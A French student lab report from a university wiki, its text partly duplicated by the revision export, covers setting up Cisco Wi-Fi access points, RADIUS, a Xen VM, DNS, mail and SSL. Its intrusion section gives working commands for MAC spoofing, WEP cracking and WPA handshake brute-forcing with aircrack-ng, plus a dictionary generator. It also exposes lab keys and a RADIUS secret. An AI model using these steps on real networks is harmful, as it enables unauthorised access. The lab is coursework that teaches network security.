</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
# /etc/ssh/sshd_config<br />
# PermitRootLogin yes<br />
<br />
# if down eth0 <br />
# ifup etho<br />
# apt-get purge network-manage systemd <br />
# inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
# service bind9 stop<br />
# service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
# apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
# nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
# newaliases<br />
# mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
# mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
# cat /etc/network/interfaces<br />
# source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
# auto lo<br />
# iface lo inet loopback<br />
<br />
Ethernet interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 172.26.79.241<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
# apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
# ls<br />
# aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
# gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
# ./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23163
TP sysres IMA2a5 2015/2016 G3
2015-11-23T16:53:46Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Sécurisation Wifi par WPA2-EAP</h2><br />
<br />
<h3>Configuration du point d’accès</h3><br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
Configuration:<br />
<pre><br />
ap(config)#line vty 0 15 <br />
ap(config-line)#password ****<br />
<br />
ap(config)#ip default-gateway 172.20.99.254<br />
<br />
ap(config)#interface bvi 1 <br />
ap(config-if)#ip ad 172.20.99.6 255.255.255.0 <br />
</pre><br />
<br />
<h3>Configuration de la machine virtuel</h3><br />
<br />
On installe freeradius: <br />
<pre><br />
# apt-get install FreeRadius<br />
</pre><br />
<br />
On configure la conexion:<br />
<pre><br />
# nano eap.conf<br />
// on remplace <br />
default_eap_type = md5<br />
// par<br />
default_eap_type = peap<br />
<br />
# nano clients.conf <br />
client 172.20.99.0/24 {<br />
secret = topsecret<br />
shortname = wifi<br />
<br />
# nano users <br />
john Cleartext-Password := "****"<br />
<br />
# service freeradius restart<br />
</pre><br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
